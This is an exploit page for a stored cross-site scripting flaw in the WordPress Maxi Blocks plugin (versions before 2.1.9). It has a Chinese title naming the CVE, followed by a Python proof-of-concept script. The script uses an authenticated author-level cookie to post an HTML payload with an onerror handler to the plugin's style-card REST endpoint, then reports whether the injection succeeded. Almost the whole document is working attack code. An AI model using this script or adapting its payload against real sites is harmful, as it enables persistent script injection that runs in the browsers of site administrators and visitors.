CVE-2026-6378 WordPress Maxi Blocks存储型XSS漏洞

import requests # Exploit Title: WordPress Maxi Blocks < 2.1.9 - Stored XSS # Description: Inject malicious script via sc_styles parameter target_url = "http://target-site.com/wp-json/maxi-blocks/v1.0/style-card" # Attacker needs a valid authenticated cookie (Author level or higher) cookies = { "wordpress_logged_in_xxxxx": "your_cookie_here" } # Malicious payload to be injected payload_data = { "sc_styles": "<img src=x onerror=alert('XSS')>", "id": "1" } headers = { "Content-Type": "application/json" } try: response = requests.post(target_url, json=payload_data, cookies=cookies, headers=headers) if response.status_code == 200: print("[+] Payload injected successfully!") print("[+] Check the admin panel or pages using the style card to verify execution.") else: print(f"[-] Failed. Status code: {response.status_code}") except Exception as e: print(f"Error: {e}")